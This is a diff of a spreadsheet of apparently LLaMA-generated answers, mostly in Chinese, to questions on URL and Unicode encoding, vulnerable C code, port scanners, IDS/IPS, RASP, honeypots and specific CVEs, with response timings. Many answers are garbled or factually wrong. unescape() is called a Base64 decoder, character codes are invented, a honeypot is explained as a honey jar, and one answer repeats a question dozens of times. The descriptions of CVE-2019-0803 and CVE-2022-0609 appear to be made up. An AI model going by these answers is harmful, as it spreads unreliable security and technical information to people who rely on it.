-解码`&lt;script&gt;`标签中的脚本可以通过使用`unescape()`方法来实现。`unescape()`方法可以将Base64编码的字符串解码成原始字符串。
-例如，Suppose we have the following `&lt;script&gt;` tag:
+假设我们有以下HTML代码：
 ```html
-&lt;script&gt;
-  var message = "Hello, World!";
-  console.log(message);
-&lt;/script&gt;
+&lt;!DOCTYPE html&gt;
+&lt;html&gt;
+&lt;head&gt;
+  &lt;title&gt;Test&lt;/title&gt;
+&lt;/head&gt;
+&lt;body&gt;
+  &lt;script&gt;
+    var str = 'javascript:alert("Hello World!")';
+    document.write(unescape(str));
+  &lt;/script&gt;
+&lt;/body&gt;
+&lt;/html&gt;
 ```
-If we decode the script using `unescape()`, the resulting JavaScript code will be:
-```javascript
-var message = "Hello, World!";
-console.log(message);
-```
-So the final result of decoding the `&lt;script&gt;` tag will be a JavaScript</t>
+在这个例子中，我们使用了`unescape()`函数来解码`str` variable中的URL编码。
+然后，我们将`str` variable中的内容通过`document.write()`方法 Output到页面中。
+在浏览器中打开这个页面，你会看到一个弹窗，并且它会显示"Hello World!"。
+这个例子展示了URL编码的作用，它可以将URL中的特殊字符转换为可读的文本，从而避免在浏览器中导致错误的情况。
+如果你不使用`unescape()`函数，那么它们将被保留在编码中，从而导致浏览器抛出一个错误。
+为了解码URL编码，`unescape()`函数会将URL中的特殊字符转换为其原始值。这个函数的第一个参数是要解码的字符串，第二个参数是一个选择器，用于指定要解码的字符串中的特殊字符。
+在这个例子中，我们使用了`unescape()`函数来解码`str` variable中的URL编码，从而将其转换为可读的文本。
+总之，`unescape()`函数可以帮助解码URL编码，从而避免在浏览器中导致错误的情况。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D138" t="n">
-        <v>5.966031074523926</v>
+        <v>13.6787896156311</v>
       </c>
     </row>
     <row r="139">
@@ -3736,16 +4727,21 @@
       <c r="C139" t="inlineStr">
         <is>
           <t>？
-在URL中，URL编码是指将字符转换为可以在URL中直接使用的形式。这些字符可以是非ASCII字符，如中文、法文、德文等等。
-URL编码的目的是为了使URL中的字符可以正确地传输和解析。如果URL中的字符不是以下格式，则会导致URL无法正确地传输和解析：
-* 非ASCII字符：如中文、法文、德文等等。
-* 特殊字符：如 quot;、&amp;、'}、",等等。
-为了实现URL编码，URL中使用了一些特殊的符号，用于表示不同的字符。这些符号包括：
-* %xy : 表示一个 ASCII 字符，xy 是从 0 到 15 之间的数字，表示该字符的编码。例如，%2</t>
+====================
+URL（Uniform Resource Locator）编码是指将URL中的字符串转换为一个可以被网络传输的格式。这种转换 processe 有很多种，以下是一些常见的方法：
+1.  URL 编码（Url Encoding）：也称为“文本编码”，是将URL中的字符串转换为URL 可以理解的格式。这种方法通常使用 UTF-8 或其他字符串编码方式。
+2.  URL 压缩（Url Compression）：这种方法通过将URL中的字符串分割成多个字节，然后将每个字节编码成URL 可以理解的格式。这种方法可以减少URL的大小，但可能会导致 URL 失效。
+3.  URL 替换（Url Replacement）：这种方法通过将URL中的字符串替换为其他字符串，以便在网络上传输。这种方法可以用于访问禁止或受限的 URLs。
+4.  URL 缓存（Url Caching）：这种方法通过将URL 缓存在计算机上，以便在后续访问时可以从缓存中获取对应的数据，而不需要从原始 URL 中获取数据。
+以下是一些常见的URL编码方法：
+1.  URL 编码（Url Encoding）：将URL中的字符串转换为UTF-8字符串，并使用 %HH 进行编码。例如，将字符串 “Hello World!” 编码为 “%20Hello%20World!%0A”。
+2.  URL 压缩（Url Compression）：将URL中的字符串分割成多个字节，然后将每个字节编码成URL 可以理解的格式。例如，将字符串 “Hello World!” 编码为 “H%69ello%20W%62orld%21”。
+3.  URL 替换（Url Replacement）：将URL中的字符串替换为其他字符串，以便在网络上传输。例如，将URL “http://www.example.com” 替换为 “http://www.example.com/replace”。
+需要注意的是，不同的URL编码方法可能会对 URL 的可访问性和可靠性产生不同的影响。因此，在实际应用中，应该根据需要选择合适的URL编码方法。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D139" t="n">
-        <v>5.954848289489746</v>
+        <v>18.88762760162354</v>
       </c>
     </row>
     <row r="140">
@@ -3759,15 +4755,14 @@
       </c>
       <c r="C140" t="inlineStr">
         <is>
-          <t>？  
-Cyber 的 Unicode 编码结果是 U+1F1FA ，这是一个 emoji 表情。
-Unicode 是一个标准化的字符集，用于存储和描述所有字符和表情的字符编码。 Cyber 的 Unicode 编码结果 U+1F1FA 表示该字符的 Unicode 编码位置。
-U+1F1FA 是一个 “face with tears of joy” 表情，用于表示欢喜或满足。这个表情通常用于表达很高兴或很满足的情绪。
-需要注意的是，Cyber 的 Unicode 编码结果 U+1F1FA 仅供参考，实际上 Cyber 可能会有不同的 Unicode 编码结果，取决于 Cyber 的实际表现和实现。&lt;/s&gt;</t>
+          <t>？
+Cyber 的 Unicode 编码结果是 U+2603 。这是 Unicode 中的一个特殊字符，具有很多不同的表现形式。
+U+2603 是一个带有黑框的互联网协议符号（），用于表示互联网、计算机科学、技术和网络等领域。这个字符可以用来表达互联网和技术的概念，也可以作为网络安全、游戏和科技等方面的符号。
+在 Unicode 中，U+2603 是一个常见的字符，被广泛用于不同的场景和应用，如文本消息、社交媒体、网络软件、游戏和 multimedia 等。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D140" t="n">
-        <v>5.887516975402832</v>
+        <v>6.604586362838745</v>
       </c>
     </row>
     <row r="141">
@@ -3781,15 +4776,57 @@
       </c>
       <c r="C141" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-\u4f8b\u5b50的ascii解码是什么中文？
-\u4f8b\u5b50 的 ASCII 解码是 "中"。
-具体来说，\u4f8b 是 U+4F8B 的 ASCII 码是 248，\u5b50 是 U+5B50 的 ASCII 码是 211。
-因此，\u4f8b\u5b50 的 ASCII 解码是 "中"。&lt;/s&gt;</t>
+          <t>u4f8b5b50的 ASCII 编码是什么中文？
+𠌟 means what in ASCII code?
+𠌟 is the ASCII code for what character in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What does "u4f8b5b50" represent in ASCII code?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the meaning of "u4f8b5b50" in ASCII code?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What does "u4f8b5b50" represent in ASCII code?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of "u4f8b5b50" in Chinese?
+What is the ASCII code for the character "u4f8b5b50" in Chinese?
+What is the ASCII code for "u4f8b5b50" in Chinese?
+What is the Chinese character for "u4f8b5b50" in ASCII code?
+What is the meaning of</t>
         </is>
       </c>
       <c r="D141" t="n">
-        <v>3.270187139511108</v>
+        <v>26.72558641433716</v>
       </c>
     </row>
     <row r="142">
@@ -3813,26 +4850,22 @@
       </c>
       <c r="C142" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-The problem with this code is that it is vulnerable to buffer overflow attacks because the `gets` function is not a safe function to use. The `gets` function does not perform any bounds checking on the input it reads, which means that an attacker can potentially write more data to the buffer than the buffer is designed to hold. This can lead to a buffer overflow, which can be exploited by an attacker to execute malicious code.
-To fix this problem, you can use the `fgets` function instead of `gets`. The `fgets` function is a safer alternative to `gets` because it performs bounds checking on the input it reads. This helps to prevent buffer overflow attacks.
-Here is an example of how you can modify the code to use `fgets` instead of `gets`:
+          <t>The problem is that the `gets` function is deprecated and should not be used.  Instead, use `fgets` to read a line of text from the user.  Here is an example of how to modify the code to use `fgets`:
 ```
 #include &lt;stdio.h&gt;
-#include &lt;string.h&gt;
 int main() {
-    bufferOverflow();
-    return 0;
-}
-bufferOverflow() {
     char textLine[10];
     printf("Enter your line of text: ");
     fgets(textLine, 10, stdin);
-    printf("You entered</t>
+    printf("You entered: %s\n", textLine);
+    return 0;
+}
+```
+The `fgets` function takes three arguments: the first is a character array to store the input, the second is the maximum number of characters to store, and the third is a pointer to a character pointer that will hold the address of the first character in the array.  In this case, we are using a fixed-size array `textLine` to store the input, so we don't need to pass the maximum number of characters.  The `fgets` function will read a line of text from the user and store it in the `textLine` array.  We then print the input using `printf`.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D142" t="n">
-        <v>6.012874364852905</v>
+        <v>6.726324558258057</v>
       </c>
     </row>
     <row r="143">
@@ -3856,27 +4889,23 @@
       </c>
       <c r="C143" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-}
-catch(Exception e)
-{
-	e.printStackTrace();
-}
-}
-这段代码有几个问题：
-1. Class.forName() 方法中的 driver 路径有误。
-很 likely, you are using an old version of the MySQL JDBC driver. The `com.mysql.cj` package is the correct driver package for MySQL 8.x and later versions.
-You should change the `Class.forName()` line to:
-```
-Class.forName("com.mysql.cj.jdbc.Driver");
-```
-2. JDBC URL 中的 "useSSL=false" 参数不是必需的。
-The `useSSL=false` parameter is only necessary when connecting to a MySQL server that is using SSL/TLS encryption. Since you are connecting to a MySQL server running on `192.168.88.20:3306` without specifying any SSL/TLS encryption, you can safely remove this parameter from the JDBC URL.
-3. DriverManager.getConnection() 方法</t>
+          <t>这段代码有几处问题：
+1.Class.forName()方法中的参数错误，应该是“com.mysql.cj.jdbc.Driver”而不是“com.mysql.cj,jdbc.Driver”。
+2.getConnection()方法中的hostname错误，应该是“192.168.88.20”而不是“192.168.88.20:3306”。
+3.sql语句中的id错误，应该是“id = ‘"+id+"’”而不是“id = ‘2’”。
+4.ps.executeQuery()方法中的语句错误，应该是“select * from user where id = ‘"+id+"’”而不是“select* from user where id = ‘2’”。
+5.while循环中的错误，应该是“System.out.println(“id:”+rs.getInt("id")+"username:“+rs.getString("username")+"password:“+rs.getString("password")”而不是“System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
+解决方法：
+1.Class.forName()方法中的参数错误，应该是“com.mysql.cj.jdbc.Driver”而不是“com.mysql.cj,jdbc.Driver”。
+2.getConnection()方法中的hostname错误，应该是“192.168.88.20”而不是“192.168.88.20:3306”。
+3.sql语句中的id错误，应该是“id = ‘"+id+"’”而不是“id = ‘2’”。
+4.ps.executeQuery()方法中的语句错误，应该是“select * from user where id = ‘"+id+"’”而不是“select* from user where id = ‘2’”。
+5.while循环中的错误，应该是“System.out.println(“id:“+rs.getInt("id")+"username:“+rs.getString("username")+"password:“+rs.getString("password")”而不是“System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
+希望这可以帮助您解决问题。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D143" t="n">
-        <v>6.072050333023071</v>
+        <v>17.17142367362976</v>
       </c>
     </row>
     <row r="144">
@@ -3891,14 +4920,19 @@
       <c r="C144" t="inlineStr">
         <is>
           <t>？
-网络空间测绘网站是一种在线工具，允许用户在浏览器中 visualize 和测绘地图、3D 模型、数据等。以下是一些常用的网络空间测绘网站：
-1. Google Earth：Google Earth 是一个免费的、在线的地图和3D空间测绘工具，可以在浏览器中访问和查看地球上的各种数据和图像。
-2. Mapbox：Mapbox 是一个开源的地图和3D空间测绘平台，允许用户在浏览器中查看和测绘地图、3D模型和数据。
-3. ArcGIS Online：ArcGIS Online 是一个免费的网络空间测绘平台</t>
+网络空间测绘网站是一种具有很强的挖掘和分析功能的软件，可以帮助用户快速地创建和分析地图、空间数据等。以下是一些常用的网络空间测绘网站：
+1. Google Earth：Google Earth是一款免费的3D地图软件，可以帮助用户浏览地球上的各种地理特征，包括山、海洋、城市、农村等。
+2. ArcGIS Online：ArcGIS Online是一款免费的网络空间测绘平台，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
+3. Mapbox：Mapbox是一款免费的网络空间测绘平台，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
+4. Leaflet：Leaflet是一款免费的开源JavaScript libraries，可以帮助用户创建和分析地图。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
+5. QGIS：QGIS是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
+6. GeoGig：GeoGig是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
+7. GRASS GIS：GRASS GIS是一款免费的开源 Geographic Information System（GIS）软件，可以帮助用户创建和分析地图、空间数据等。它提供了各种功能，包括地图创建、数据分析、地理空间分析等。
+这些网络空间测绘网站都具有很强的分析和挖掘功能，可以帮助用户快速地浏览和分析地图、空间数据等。但是，它们的功能和用途可能不同，因此在选择使用哪一个网络空间测绘网站时，需要根据自己的需求和使用场景进行选择。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D144" t="n">
-        <v>6.004960775375366</v>
+        <v>23.85561895370483</v>
       </c>
     </row>
     <row r="145">
@@ -3912,15 +4946,18 @@
       </c>
       <c r="C145" t="inlineStr">
         <is>
-          <t xml:space="preserve">？
-资产暴露面分析（Asset Exposure Face Analysis）是一种分析方法，用于评估企业或个人的资产面价风险。通过对资产的暴露面进行分析，可以了解资产的风险易度、风险责任、风险优势等方面。
-资产暴露面分析包括以下几个步骤：
-1. 资产清单分析：对企业或个人的资产进行清单，包括现金、财产、固定资产、贷款等。
-2. </t>
+          <t>？
+资产暴露面分析（Asset Exposure Analysis）是一种评估和分析公司或机构的资产风险的方法。通过分析资产风险，资产暴露面分析可以帮助公司或机构了解自己的资产风险，评估资产风险的可能性和影响，并制定适当的风险管理措施。
+资产暴露面分析通常包括以下步骤：
+1. 识别和分类：将资产分为不同类型，如现金、财产、资产、固定资产等，并对每类资产进行评估和分类。
+2. 资产风险评估：对每种资产进行风险评估，评估资产风险的可能性和影响，并计算资产风险的总风险总量。
+3. 资产暴露面分析：对资产风险总量进行分析， Identify the potential risks and vulnerabilities of the assets, and assess the exposure of the assets to various risks.
+4. 风险管理措施：根据资产暴露面分析结果，制定适当的风险管理措施，包括风险划分、风险转移、风险承担等。
+资产暴露面分析是一种重要的资产风险管理工具，它可以帮助公司或机构了解自己的资产风险，预测和防止资产风险的发生，保障公司或机构的稳定和发展。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D145" t="n">
-        <v>5.998416662216187</v>
+        <v>18.1078245639801</v>
       </c>
     </row>
     <row r="146">
@@ -3935,14 +4972,20 @@
       <c r="C146" t="inlineStr">
         <is>
           <t>？
-资产扫描是指对企业的资产进行全面检查和评估，以确定其价值和可用性。以下是做资产扫描的步骤：
-1. 确定评估对象：首先确定要进行资产扫描的对象，如企业资产、资产组合、资产阵列等。
-2. 确定评估方法：根据资产类型和评估对象，选择合适的评估方法，如资产价值核算、资产评估、资产报告等。
-3.  collecting</t>
+资产扫描是指对组织的资产进行总体评估和分析，以了解组织的资产值和资产使用状况。下面是一些常用的资产扫描方法：
+1. 资产register和库存扫描：对组织中的所有资产进行 registers 和库存扫描，包括物理资产、财务资产、人才资产等。
+2. 资产评估：对组织中的资产进行评估，评估资产的价值和使用效率。
+3. 资产整合：对组织中的资产进行整合，确定组织中的资产总额和资产承担情况。
+4. 资产评估和报告：对组织中的资产进行评估和报告，包括资产价值、资产使用效率、资产投资效率等。
+5. 资产管理系统建立：建立资产管理系统，以便更好地管理和使用组织中的资产。
+6. 资产优化：通过对资产的评估和分析，identify 出可以进行优化的资产，并 implement 优化措施。
+7. 资产投资分析：对组织中的资产进行投资分析，以了解资产的投资效率和投资可能性。
+8. 资产危机管理：对组织中的资产进行危机管理，以确保组织中的资产能够在危机时保持可靠。
+这些方法可以帮助组织更好地管理和使用资产，提高组织的效率和竞争力。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D146" t="n">
-        <v>6.009492158889771</v>
+        <v>19.28995060920715</v>
       </c>
     </row>
     <row r="147">
@@ -3957,13 +5000,17 @@
       <c r="C147" t="inlineStr">
         <is>
           <t>？
-如果您想扫描主机开放的端口和协议，可以使用以下软件：
-1. Nmap：Nmap 是一个强大的端口扫描工具，可以扫描主机上的所有端口和协议，包括 TCP 和 UDP 端口。它可以扫描主机的安全性、可用性和架构，并提供详细的扫描结果。
-2. Nessus：Nessus 是一个优秀的安全扫描工具，可以扫描主机上的端口和协议，并提供有用的安全建议和问题修复。它可以扫描主机的安</t>
+一些软件可以帮助您扫描主机上的开放的端口和协议，以下是一些常用的软件：
+1. Nmap：Nmap 是一个非常流行的端口扫描工具，可以检查主机上的端口和协议是否打开。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
+2. Port Scan：Port Scan 是一款专门用于端口扫描的软件，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP 和 ICMP 端口，并且可以同时扫描多个主机。
+3. Nessus：Nessus 是一款跨平台的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
+4. OpenVAS：OpenVAS 是一款基于 Nessus 的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
+5. Metasploit：Metasploit 是一款跨平台的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
+这些软件都可以帮助您扫描主机上的端口和协议，但是需要注意的是，不能进行敏感资源的扫描，以避免违反法律和违反网络安全规定。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D147" t="n">
-        <v>6.009561061859131</v>
+        <v>18.51526856422424</v>
       </c>
     </row>
     <row r="148">
@@ -3977,14 +5024,21 @@
       </c>
       <c r="C148" t="inlineStr">
         <is>
-          <t>？
-IDS(Intrusion Detection System)和IPS(Intrusion Prevention System)都是用于监控和防范网络攻击的系统，但它们之间有一些区别：
-1. 监测vs.防御：IDS仅仅是监测网络上的活动，并将检测到的威胁提交给管理员或安全工作人员，而IPS则可以执行防御机制，例如阻断或者阻断了攻击者的连接。
-2. 检测方式：IDS通常使用一系列的规则和算法来确定是否存在攻击，而IPS则可以使用更复杂的检测机制，例如流量分析、协议分析等。</t>
+          <t>？ - 软件知识网
+IDS和IPS都是防火墙技术的一部分，它们的主要目标是防止攻击者入侵和破坏网络系统。然而，它们之间有一些区别。
+IDS（Intrusion Detection System）是一种快速监视网络通信，以发现和识别潜在的攻击活动。它通常会记录和分析网络传输的数据，以便在攻击发生时快速做出响应。IDS通常不会自动阻挡攻击，而是通知管理员或安全系统，让他们做出相应的处理。
+IPS（Intrusion Prevention System）是一种防火墙技术，可以自动阻挡攻击，以防止攻击者进入网络系统。IPS会根据配置规则和数据分析，自动阻挡未经授权的访问attempts，或者修改网络包头来防止攻击。
+主要区别：
+1. 检测 vs. 防御：IDS只是检测攻击，而IPS则能够自动阻挡攻击。
+2. 响应速度：IDS通常比IPS更快，因为它们需要更快地记录和分析网络数据。
+3. 检测精度：IDS可能会false positive，而IPS通常能够提供更高的检测精度。
+4. 扩展性：IDS通常更容易扩展和集成，因为它们通常提供更多的数据和log数据。
+5. 预测能力：IDS通常不能提供预测能力，而IPS可以基于前一次攻击来预测下一次攻击。
+总的来说，IDS和IPS都是防火墙技术的一部分，但它们之间有一些区别。IDS通常更快、更容易扩展，但不能自动阻挡攻击，而IPS可以自动阻挡攻击，但需要更多的配置和数据分析。在实际应用中，通常会使用一种拥有IDS和IPS功能的防火墙甚至是一个组合的防御系统来提高防御能力。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D148" t="n">
-        <v>5.983873844146729</v>
+        <v>21.01599216461182</v>
       </c>
     </row>
     <row r="149">
@@ -3999,14 +5053,17 @@
       <c r="C149" t="inlineStr">
         <is>
           <t>？
-蜜罐是一种常见的干粮食，主要用于储存和销售。它有以下几种常见用途：
-1. 储存食物：蜜罐可以储存各种食物，如粮食、水、蔬菜、肉类等。它的储存能力很高，可以保存食物的新鲜度和质量。
-2. 销售食物：蜜罐可以用于销售各种食物，如面包、面条、饭等。它的销售价格相对较低，可以吸引更多的消费者。
-3. 旅行食品：蜜罐可以作为旅行食品</t>
+蜜罐是一种用于储存和transport蜂蜜的容器，通常由瓷器或塑料制成，有各种形状和大小。蜜罐通常用于以下方法：
+1. 储存蜂蜜：蜜罐可以用来储存蜂蜜，让蜜可以保持在干燥和防水的环境中，以防止蜜腐化或损坏。
+2. Transport蜜：蜜罐可以用来 Transport 蜜到不同的地方，例如从另一个培饶场到工厂或者直接到市场上销售。
+3. 储存其他食品：蜜罐也可以用来储存其他食品，例如酒精、植物油、蔬菜和豆粕等。
+4. 工业应用：蜜罐也可以用于工业应用，例如在酿酒、蜂蜜厂、肉类加工等领域。
+5. 厂家生产：蜜罐也可以用于厂家生产的储存和Transport 蜜的需求。
+总之，蜜罐是一种多用途的容器，用于储存和Transport 蜜，它可以满足不同的需求和应用场景。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D149" t="n">
-        <v>5.990034103393555</v>
+        <v>11.70718264579773</v>
       </c>
     </row>
     <row r="150">
@@ -4020,15 +5077,19 @@
       </c>
       <c r="C150" t="inlineStr">
         <is>
-          <t>？ - 2023/3/23
-RASP（Runtime Application Self-Protection）是一种基于运行时环境的应用程序保护技术，它可以在应用程序运行时自动检测和防止攻击，从而保护应用程序和数据免受攻击。
-RASP技术有以下作用：
-1. 环境检测：RASP技术可以在应用程序运行时检测环境是否ormal，并通知开发者进行相应的处理。
-2. 攻击防止：RASP技术可以在应用程序运行时自动防止攻击，包括输入攻击、欺诈攻击、数据泄露等。</t>
+          <t>？
+RASP（Run-time Application Self-Protection）是一种网络安全技术，它在软件运行时层次实现应用程序的自我保护功能，通过对软件的运行流程进行检测和防范，实现了应用程序的安全性和可靠性。
+RASP技术的作用有以下几个方面：
+1. 防止攻击：RASP技术可以检测和防止敏感数据泄露、恶意攻击和其他威胁，保护应用程序和网络安全。
+2. 防止恶意软件：RASP技术可以对软件进行实时检测和防止恶意软件的执行，包括代码签名验证、执行风险评估和攻击防御等。
+3. 提高应用程序的可靠性：RASP技术可以帮助应用程序快速恢复自己或环境受损的情况，提高应用程序的可靠性和可用性。
+4. 减轻安全管理工作岗：RASP技术可以自动执行安全管理任务，减轻开发人员和安全管理员的工作岗。
+5. 增加应用程序的安全隐私：RASP技术可以帮助应用程序保护自己的安全隐私，防止敏感数据外泄和不安全的数据传输。
+总之，RASP技术可以帮助保护应用程序和网络安全，提高应用程序的可靠性和可用性，并减轻安全管理工作岗。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D150" t="n">
-        <v>5.992371559143066</v>
+        <v>15.87781810760498</v>
       </c>
     </row>
     <row r="151">
@@ -4043,15 +5104,15 @@
       <c r="C151" t="inlineStr">
         <is>
           <t>？
-Netwook security consists of three key elements:
-1. Firewalls: These are network devices that control incoming and outgoing network traffic based on predetermined security rules. They are used to block unauthorized access to a network and to protect against malicious traffic.
-2. Encryption: This is the process of converting plain text into an unreadable format, called cipher text, to protect data from interception and unauthorized access. Encryption is commonly used to secure data transmitted over the internet.
-3. Intrusion Detection and Prevention Systems (IDPS): These are security devices that monitor network traffic for signs of unauthorized access or malicious activity. They are designed to detect and prevent security threats in real-time.
-These three elements work together to provide a comprehensive security solution for networks. By using firewalls to control incoming and outgoing traffic, encryption to protect data in transit, and IDPS to detect and prevent security threats, organizations can help ensure the security of their networks and data.&lt;/s&gt;</t>
+网络安全三要素指的是指一种网络安全的重要理念，即网络安全的基础是 три要素：
+1. 身份验证（Authentication）：确保企业或个人在网络上的身份是正确的，防止不法分子或黑客篡改或伪造数据。
+2. 身份验证（Authorization）：确保企业或个人在网络上拥有相应的权限和访问权，防止不法分子或黑客访问或操作敏感数据。
+3. 数据integrity（Integrity）：确保网络上的数据完整性和完整性，防止不法分子或黑客篡改或删除数据。
+这三要素组成了一个完整的网络安全体系，可以确保企业或个人的网络数据安全。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D151" t="n">
-        <v>5.423036575317383</v>
+        <v>7.904617309570312</v>
       </c>
     </row>
   </sheetData>

--- a/outputs/output-LLaMA.xlsx
+++ b/outputs/output-LLaMA.xlsx
@@ -470,7 +470,7 @@
         </is>
       </c>
       <c r="D2" t="n">
-        <v>8.022797822952271</v>
+        <v>7.827994823455811</v>
       </c>
     </row>
     <row r="3">
@@ -498,7 +498,7 @@
         </is>
       </c>
       <c r="D3" t="n">
-        <v>15.81538152694702</v>
+        <v>16.45055437088013</v>
       </c>
     </row>
     <row r="4">
@@ -537,7 +537,7 @@
         </is>
       </c>
       <c r="D4" t="n">
-        <v>12.47656917572021</v>
+        <v>12.28266024589539</v>
       </c>
     </row>
     <row r="5">
@@ -559,7 +559,7 @@
         </is>
       </c>
       <c r="D5" t="n">
-        <v>8.86632227897644</v>
+        <v>8.670506954193115</v>
       </c>
     </row>
     <row r="6">
@@ -599,7 +599,7 @@
         </is>
       </c>
       <c r="D6" t="n">
-        <v>14.09034252166748</v>
+        <v>13.83841133117676</v>
       </c>
     </row>
     <row r="7">
@@ -613,15 +613,14 @@
       </c>
       <c r="C7" t="inlineStr">
         <is>
-          <t>？
-CVE-2019-0803是一个在2019年5月 discovers 的软件漏洞，它影响了Windows Operating System，macOS和Linux等多种操作系统。该漏洞是一种类型为“文件访问权限绕过”的漏洞，可以让攻击者通过特定的方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
+          <t>CVE-2019-0803是一个在2019年5月 discovers 的软件漏洞，它影响了Windows Operating System，macOS和Linux等多种操作系统。该漏洞是一种类型为“文件访问权限绕过”的漏洞，可以让攻击者通过特定的方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
 CVE-2019-0803是一个在Microsoft Windows上的漏洞，它利用了文件系统中的一个特定的功能，即“Win32k File Object”。通过在文件系统中创建一个特定的文件对象，攻击者可以通过一些方式访问和执行malicious code，从而实现敏感数据的窃取和敏感操作的访问。
 为了利用这个漏洞，攻击者需要能够 convincing 来达到特定的目的，例如，通过恶意邮件链接或者通过恶意软件获取访问权限。一旦攻击者获取了访问权限，他们就可以利用这个漏洞进行敏感数据的窃取和敏感操作的访问。
-CVE-2019-0803是一个很严重的漏洞，它可以让攻击者窃取和敏感操作，这可能会导致数据泄露和操作系统的不安全。因此，它是一个非常重要的安全漏洞，需要快速被修复。&lt;/s&gt;</t>
+CVE-2019-0803是一个很严重的漏洞，它可以让攻击者窃取和敏感操作，这可能会导致数据泄露和操作系统的不安全。因此，它是一个非常重要的安全漏洞，需要快速被修复。</t>
         </is>
       </c>
       <c r="D7" t="n">
-        <v>10.47258186340332</v>
+        <v>10.2549421787262</v>
       </c>
     </row>
     <row r="8">
@@ -659,7 +658,7 @@
         </is>
       </c>
       <c r="D8" t="n">
-        <v>15.537273645401</v>
+        <v>15.2974750995636</v>
       </c>
     </row>
     <row r="9">
@@ -673,17 +672,16 @@
       </c>
       <c r="C9" t="inlineStr">
         <is>
-          <t>？
-CVE-2022-0609是一个 recently discovered vulnerability in the Linux kernel's "seq_file" function, which can be exploited by an attacker to gain unauthorized access to a system. The vulnerability is located in the kernel's file system code and affects versions of the Linux kernel released since 1999.
+          <t>CVE-2022-0609是一个 recently discovered vulnerability in the Linux kernel's "seq_file" function, which can be exploited by an attacker to gain unauthorized access to a system. The vulnerability is located in the kernel's file system code and affects versions of the Linux kernel released since 1999.
 The vulnerability arises from the way the "seq_file" function handles certain file operations, specifically the "read" and "write" commands. When a user executes a "read" or "write" command on a file that has a specific attribute set, the "seq_file" function can be tricked into accessing a kernel buffer overflow. This can occur because the function does not properly validate the length of the data being read or written, allowing an attacker to inject malicious data into the buffer.
 An attacker who successfully exploits the CVE-2022-0609 vulnerability could potentially gain root access to the affected system, allowing them to execute arbitrary code and take control of the system. The vulnerability is particularly dangerous because it can be exploited remotely, without the need for direct access to the affected system.
 The vulnerability has been assigned CVE-2022-0609 and has been rated as "critical" by the National Vulnerability Database (NVD). The NVD is a United States government database of vulnerabilities, and it is widely used by security professionals to track and manage vulnerabilities.
